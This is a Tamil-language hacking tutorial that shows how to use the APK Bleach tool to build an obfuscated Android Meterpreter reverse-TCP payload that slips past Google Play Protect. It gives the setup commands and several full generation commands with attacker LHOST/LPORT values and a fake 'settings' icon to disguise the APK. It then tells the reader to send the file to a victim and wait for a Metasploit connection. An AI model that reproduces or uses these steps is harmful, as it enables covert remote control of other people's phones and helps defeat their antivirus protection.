How to bypass Google Play Protect with Apk Bleach
எங்கள் முந்தைய இடுகைகளில் காட்டப்பட்டுள்ளபடி Android சாதனங்களை ஹேக்கிங் செய்வதற்கான பெரும்பாலான வழிகள் நன்றாக வேலை செய்கின்றன. ஆனால் அவை நன்றாக வேலை செய்வதால், கூகிள் அவற்றை ப்ளே ப்ரொடெக்ட் சேவையுடன் தடுக்கத் தொடங்கியுள்ளது. இது ஆண்ட்ராய்டில் கட்டமைக்கப்பட்ட இயல்புநிலை வைரஸ் தடுப்பு கருவிகளில் ஒன்றாகும், ஆனால் அது முட்டாள்தனம் அல்ல. எனவே இந்த டுடோரியலில், Google Play Prodect ஹேக்கர்கள் எவ்வாறு புறக்கணிக்க முடியும் என்பதைக் காண்பிப்போம் Android சாதனங்களை பாதுகாக்கவும் மற்றும் ஹேக் செய்யவும்:
Google Play Security and Antivirus (A.K.A Goole Play Protect):
Google Play Protect என்பது Android சாதனங்களைப் பாதுகாக்க உருவாக்கப்பட்ட Google வைரஸ் தடுப்பு மென்பொருளாகும். கூகிள் பிளே ஸ்டோரைக் கொண்ட அனைத்து சமீபத்திய Android தொலைபேசிகளிலும் இந்த கவசம் இயல்பாக சேர்க்கப்பட்டுள்ளது. Android தொலைபேசிகளில் எந்தவொரு தீங்கிழைக்கும் பயன்பாட்டை நிறுவுவதை Play Protect தடுக்கிறது. கூகிள் பிளே ப்ரொடெக்ட் தீம்பொருளுக்கான சாதனத்தை ஸ்கேன் செய்கிறது மற்றும் ஏதேனும் தீம்பொருள் கண்டறியப்பட்டால் அது கீழே உள்ள படத்தில் காட்டப்பட்டுள்ளபடி உங்களை எச்சரிக்கும்:
கூகிள் பிளேயில் வழங்கப்பட்ட கேம்கள் மற்றும் உங்கள் தொலைபேசியில் நிறுவப்பட்ட பயன்பாடுகள் கூட ஸ்கேன் செய்யப்படும், மேலும் வைரஸ் கண்டறியப்பட்டால், நீங்கள் எச்சரிக்கப்படுவீர்கள் மற்றும் தீங்கிழைக்கும் மென்பொருளை அகற்ற நினைவூட்டப்படுவீர்கள்.How to bypass Google Play Protect with Apk Bleach
APK ப்ளீச் மூலம் Google Play பாதுகாப்பைத் தவிர்ப்பது எப்படி
Step 1: Kali Linux திறந்து பின்வரும் கட்டளைகளை Clone செய்து உங்கள் கணினியில் உள்ள apkbleach கருவியைப் பதிவிறக்கவும்.
git clone https://github.com/graylagx2/apkbleach
cd apkbleach
இப்போது பின்வரும் லினக்ஸ் கட்டளையுடன் கருவி செயல்படுத்த அனுமதி வழங்கவும்:
chmod + x apkbleach
Step 3: பின்வரும் கட்டளையுடன் APKBleach கருவியை இயக்கவும்:
./apkbleach
இந்த தீங்கிழைக்கும் கோப்பை உருவாக்க நீங்கள் பயன்படுத்தக்கூடிய பல விருப்பங்கள் உள்ளன. அந்த விருப்பங்களை நீங்கள் கீழே காணலாம்:
-g <android/payload/to/use LHOST=ip-address-to-use LPORT=port-to-use>
Generates obfuscated payload with nops
-i <path/to/image.png> [ use -i --list ] to list defaults
Sets image as the icon of the file.apk
-o <path/to/outputname.apk>
Sets the name of custom output file
-x <path/to/apk>
Uses pre generated metasploit payload to obfuscate
-h Help menu
இப்போது நான் எனது சொந்த தீங்கிழைக்கும் கோப்பை உருவாக்குவேன், இது கூகிள் பிளே பாதுகாப்பைத் தவிர்க்கும்.
./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -i ICONS/settings.png -o /root/Desktop/service.apk
மேலே உள்ள கட்டளையைத் தட்டச்சு செய்த பிறகு, கருவி எங்களுக்கு தீங்கிழைக்கும் கோப்பை உருவாக்க காத்திருக்கிறது.
தீங்கிழைக்கும் கோப்பை உருவாக்கி, அதை இலக்கு பாதிக்கப்பட்டவருக்கு அனுப்பிய பிறகு, மெட்டாஸ்ப்ளோயிட்டை கேட்கும் பயன்முறையில் வைத்து இணைப்பிற்காக காத்திருக்க வேண்டும்.
தீம்பொருள் கோப்பிற்கு கீழே உள்ள படத்தில் நீங்கள் காணக்கூடியது கூகிள் பிளே பாதுகாப்பால் கண்டறியப்படவில்லை.
இதனால் Google Play பாதுகாப்பு பாதுகாப்பு சேவையை வெற்றிகரமாக புறக்கணித்தோம்.
மேக்லியஸ் கோப்புகளை உருவாக்க APK ப்ளீச்சில் கீழே உள்ள எந்த கட்டளைகளையும் நீங்கள் பயன்படுத்தலாம்:
./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444
./apkbleach -x /root/msf.apk
./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -i ICONS/settings.png
./apkbleach -g android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 -i ICONS/settings.png -o /var/www/html/service.apk
Thank You
Comments